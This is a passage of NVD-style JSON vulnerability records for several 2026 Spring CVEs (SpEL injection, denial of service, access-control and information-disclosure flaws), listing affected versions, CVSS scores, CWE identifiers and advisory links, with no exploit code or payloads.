vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_mongodb:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.5.1","matchCriteriaId":"5F530EDE-94AE-42FA-A6FE-458CAC0B7EF3"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41717","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41719","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:51.800","lastModified":"2026-07-17T20:39:02.747","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"A SpEL Injection vulnerability exists in the Spring Data KeyValue if unsanitized user input is passed as Sort into a repository query method that delegates evaluation to the SpelPropertyComparator.\n\nAffected versions:\nSpring Data KeyValue / Spring Data Redis 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data KeyValue","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.5.0","lessThan":"3.5.11.1","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.15","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.17","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.16","versionType":"custom","status":"affected"},{"version":"3.1.0","lessThan":"3.1.15","versionType":"custom","status":"affected"},{"version":"3.0.0","lessThan":"3.0.16","versionType":"custom","status":"affected"},{"version":"2.7.0","lessThan":"2.7.20","versionType":"custom","status":"affected"}]},{"vendor":"Spring","product":"Spring Data Redis","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.5.0","lessThan":"3.5.11.1","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.15","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.17","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.16","versionType":"custom","status":"affected"},{"version":"3.1.0","lessThan":"3.1.15","versionType":"custom","status":"affected"},{"version":"3.0.0","lessThan":"3.0.16","versionType":"custom","status":"affected"},{"version":"2.7.0","lessThan":"2.7.20","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L","baseScore":6.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.6,"impactScore":4.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T12:54:23.195850Z","id":"CVE-2026-41719","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-917"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"2.7.0","versionEndExcluding":"2.7.20","matchCriteriaId":"DB89941D-22DD-4B81-8028-F0A57E74C168"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndExcluding":"3.0.16","matchCriteriaId":"C76D9068-5E5C-402E-B99B-5915C1B0D7EA"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"3.1.0","versionEndExcluding":"3.1.15","matchCriteriaId":"540BB780-7AF2-41F6-9BC1-9163C70CD5D6"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndExcluding":"3.2.16","matchCriteriaId":"FAC44893-5F39-4C42-978E-8FB218BCC2E2"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.17","matchCriteriaId":"D2C9EC6A-B053-44DA-A149-DDB9D75C2226"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.15","matchCriteriaId":"28AB5EE6-2B67-4B8E-AEB3-C18C1809F018"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5.0","versionEndExcluding":"3.5.11.1","matchCriteriaId":"2768A6DD-9003-45B3-9352-D76B78EC3390"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_keyvalue:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"308C68E2-ED1C-452B-A01D-C2D544B3CE5A"}]}]},{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"2.7.0","versionEndExcluding":"2.7.20","matchCriteriaId":"2F6CB495-25F3-4F6C-B2C7-994E175CBB43"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndExcluding":"3.0.16","matchCriteriaId":"969BE656-0311-488B-87A4-233A285D4928"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"3.1.0","versionEndExcluding":"3.1.15","matchCriteriaId":"B7E13B0B-60F0-49CD-BED9-AE0DC322B741"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndExcluding":"3.2.16","matchCriteriaId":"4DDE2E80-9220-49ED-B5C3-37A66913B001"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.17","matchCriteriaId":"AF85BE26-4C9D-44A4-A65A-06AF890329F1"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.15","matchCriteriaId":"392D685B-F784-46E2-8FD7-591F6CFF371A"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5.0","versionEndExcluding":"3.5.11.1","matchCriteriaId":"92B61DC7-4791-4696-864E-5FB1FDA6D0DD"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_redis:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"2DC32F88-8C70-4253-BE86-2473C958231E"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41719","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41721","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:51.917","lastModified":"2026-07-17T20:43:26.653","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data Commons contains a vulnerability that can lead to a Denial of Service (DoS) condition if Spring Data Web Support is enabled in conjunction with a Controller method using @ProjectedPayload, when an attacker sends a specially crafted HTTP request that causes the application to allocate lots of memory.\n\nAffected versions:\nSpring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.7.0 through 2.7.19."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data Commons","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.5.0","lessThan":"3.5.11.1","versionType":"custom","status":"affected"},{"version":"3.4.0","lessThan":"3.4.15","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.17","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.16","versionType":"custom","status":"affected"},{"version":"3.1.0","lessThan":"3.1.15","versionType":"custom","status":"affected"},{"version":"3.0.0","lessThan":"3.0.16","versionType":"custom","status":"affected"},{"version":"2.7.0","lessThan":"2.7.20","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:41:58.871607Z","id":"CVE-2026-41721","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"2.7.0","versionEndExcluding":"2.7.20","matchCriteriaId":"14A934B2-D150-47FE-9E80-6EB0C35970A8"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.0.0","versionEndIncluding":"3.0.15","matchCriteriaId":"17005B9A-8DC0-4086-9856-849CC07133F2"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.1.0","versionEndIncluding":"3.1.14","matchCriteriaId":"497C0C07-F7AE-410F-A2E9-B545EE613FB6"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndIncluding":"3.2.15","matchCriteriaId":"69002579-B593-40DE-A9A1-9C573F89A57C"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.17","matchCriteriaId":"9E4B8538-532D-49DA-8EF3-0D2D0571F9CC"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.4.0","versionEndExcluding":"3.4.15","matchCriteriaId":"71619FB3-3E66-4E7F-ACFC-724535FC83E8"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5.0","versionEndExcluding":"3.5.11.1","matchCriteriaId":"1137CA9F-F171-417E-9550-D85ED95C8021"},{"vulnerable":true,"criteria":"cpe:2.3:a:broadcom:spring_data_commons:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"6F2D14A5-1310-4EF0-A943-D2DB5549C25E"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41721","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41726","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.030","lastModified":"2026-07-17T20:30:46.943","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"When an application opts into DelegatingDeserializer, a producer can grow the consumer's heap without bound by sending records with unique random spring.kafka.serialization.selector header values, eventually causing GC thrash and OutOfMemoryError.\n\nAffected versions:\nSpring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring for Apache Kafka","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.15.1","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.14","versionType":"custom","status":"affected"},{"version":"2.9.0","lessThan":"2.9.14","versionType":"custom","status":"affected"},{"version":"2.8.0","lessThan":"2.8.12","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:38:31.984058Z","id":"CVE-2026-41726","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-770"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionEndExcluding":"2.8.12","matchCriteriaId":"A1B04126-FFDD-4EC7-B4B9-3050489B3682"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"2.9.0","versionEndExcluding":"2.9.14","matchCriteriaId":"AA023945-8D2F-4B64-8819-AA41F087BC18"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndExcluding":"3.2.14","matchCriteriaId":"63E0CB29-F9CC-498A-8795-1344AECBBA74"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.15.1","matchCriteriaId":"2A5CE749-924C-46F0-AD18-1FAE9FA29FCC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"00C97EF8-CDE8-47B9-B1B6-9DE53F3FF907"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41726","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41727","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.143","lastModified":"2026-07-17T20:30:53.530","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Kafka's retry topic infrastructure did not sufficiently validate user-controlled header values before acting on them. A producer could send a record with a crafted retry_topic-attempts header to supply an out-of-range attempt count and cause the retry topic router to misidentify where the message was in the retry sequence.\n\nAffected versions:\nSpring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring for Apache Kafka","defaultStatus":"unaffected","versions":[{"version":"4.0.0","lessThan":"4.0.5.1","versionType":"custom","status":"affected"},{"version":"3.3.0","lessThan":"3.3.15.1","versionType":"custom","status":"affected"},{"version":"3.2.0","lessThan":"3.2.14","versionType":"custom","status":"affected"},{"version":"2.9.0","lessThan":"2.9.14","versionType":"custom","status":"affected"},{"version":"2.8.0","lessThan":"2.8.12","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:33:57.867244Z","id":"CVE-2026-41727","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-20"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"2.8.0","versionEndExcluding":"2.8.12","matchCriteriaId":"3210AF28-E5BC-4976-BF43-339DADA089FC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"2.9.0","versionEndExcluding":"2.9.14","matchCriteriaId":"AA023945-8D2F-4B64-8819-AA41F087BC18"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"3.2.0","versionEndExcluding":"3.2.14","matchCriteriaId":"63E0CB29-F9CC-498A-8795-1344AECBBA74"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"3.3.0","versionEndExcluding":"3.3.15.1","matchCriteriaId":"2A5CE749-924C-46F0-AD18-1FAE9FA29FCC"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_for_apache_kafka:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.0.5.1","matchCriteriaId":"00C97EF8-CDE8-47B9-B1B6-9DE53F3FF907"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41727","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41728","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.260","lastModified":"2026-07-17T20:42:46.213","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data REST's JSON Patch (application/json-patch+json) implementation does not apply the write-access filter to intermediate path segments when resolving a multi-segment JSON Pointer.\n\nAffected versions:\nSpring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data REST","defaultStatus":"unaffected","versions":[{"version":"3.7.0","lessThan":"3.7.20","versionType":"custom","status":"affected"},{"version":"4.3.0","lessThan":"4.3.17","versionType":"custom","status":"affected"},{"version":"4.4.0","lessThan":"4.4.15","versionType":"custom","status":"affected"},{"version":"4.5.0","lessThan":"4.5.11.1","versionType":"custom","status":"affected"},{"version":"5.0.0","lessThan":"5.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:30:40.559216Z","id":"CVE-2026-41728","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"3.7.0","versionEndExcluding":"3.7.20","matchCriteriaId":"D5AB0CD7-F756-4FCA-A328-B0F19CBDABD6"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.3.0","versionEndExcluding":"4.3.17","matchCriteriaId":"3FA3D040-BCC5-4C66-A0AF-5383AC89048E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.4.0","versionEndExcluding":"4.4.15","matchCriteriaId":"DEEF0B3D-C5D9-496A-B300-86876DE9F3B7"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.5.0","versionEndExcluding":"4.5.11.1","matchCriteriaId":"40757E5D-97AF-4680-A7F6-2EB1FD09D39E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.5.1","matchCriteriaId":"42C8C99B-7F57-4CEE-859A-C6A005C23EFB"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41728","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41729","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.367","lastModified":"2026-07-17T20:42:27.980","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data REST is vulnerable to SpEL expression injection through map-typed properties when processing JSON Patch (application/json-patch+json) requests. When a persistent entity exposes a Map-typed property, the JSON Pointer path segment used as the map key is embedded directly into a SpEL expression without sanitization or validation.\n\nAffected versions:\nSpring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data REST","defaultStatus":"unaffected","versions":[{"version":"3.7.0","lessThan":"3.7.20","versionType":"custom","status":"affected"},{"version":"4.3.0","lessThan":"4.3.17","versionType":"custom","status":"affected"},{"version":"4.4.0","lessThan":"4.4.15","versionType":"custom","status":"affected"},{"version":"4.5.0","lessThan":"4.5.12","versionType":"custom","status":"affected"},{"version":"5.0.0","lessThan":"5.0.6","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T00:00:00+00:00","id":"CVE-2026-41729","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-917"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"3.7.0","versionEndExcluding":"3.7.20","matchCriteriaId":"D5AB0CD7-F756-4FCA-A328-B0F19CBDABD6"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.3.0","versionEndExcluding":"4.3.17","matchCriteriaId":"3FA3D040-BCC5-4C66-A0AF-5383AC89048E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.4.0","versionEndExcluding":"4.4.15","matchCriteriaId":"DEEF0B3D-C5D9-496A-B300-86876DE9F3B7"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.5.0","versionEndExcluding":"4.5.11.1","matchCriteriaId":"40757E5D-97AF-4680-A7F6-2EB1FD09D39E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.5.1","matchCriteriaId":"42C8C99B-7F57-4CEE-859A-C6A005C23EFB"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41729","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-41730","sourceIdentifier":"security@vmware.com","published":"2026-06-10T00:16:52.483","lastModified":"2026-07-17T20:42:20.240","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring Data REST serializes the full exception cause chain into HTTP error response bodies, potentially exposing persistence-layer internals to HTTP clients.\n\nAffected versions:\nSpring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5."}],"affected":[{"source":"security@vmware.com","affectedData":[{"vendor":"Spring","product":"Spring Data REST","defaultStatus":"unaffected","versions":[{"version":"3.7.0","lessThan":"3.7.20","versionType":"custom","status":"affected"},{"version":"4.3.0","lessThan":"4.3.17","versionType":"custom","status":"affected"},{"version":"4.4.0","lessThan":"4.4.15","versionType":"custom","status":"affected"},{"version":"4.5.0","lessThan":"4.5.11.1","versionType":"custom","status":"affected"},{"version":"5.0.0","lessThan":"5.0.5.1","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-06-10T17:20:50.801990Z","id":"CVE-2026-41730","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-209"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"3.7.0","versionEndExcluding":"3.7.20","matchCriteriaId":"D5AB0CD7-F756-4FCA-A328-B0F19CBDABD6"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.3.0","versionEndExcluding":"4.3.17","matchCriteriaId":"3FA3D040-BCC5-4C66-A0AF-5383AC89048E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.4.0","versionEndExcluding":"4.4.15","matchCriteriaId":"DEEF0B3D-C5D9-496A-B300-86876DE9F3B7"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"4.5.0","versionEndExcluding":"4.5.11.1","matchCriteriaId":"40757E5D-97AF-4680-A7F6-2EB1FD09D39E"},{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_data_rest:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.5.1","matchCriteriaId":"42C8C99B-7F57-4CEE-859A-C6A005C23EFB"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41730","source":"security@vmware.com","tags":["Vendor 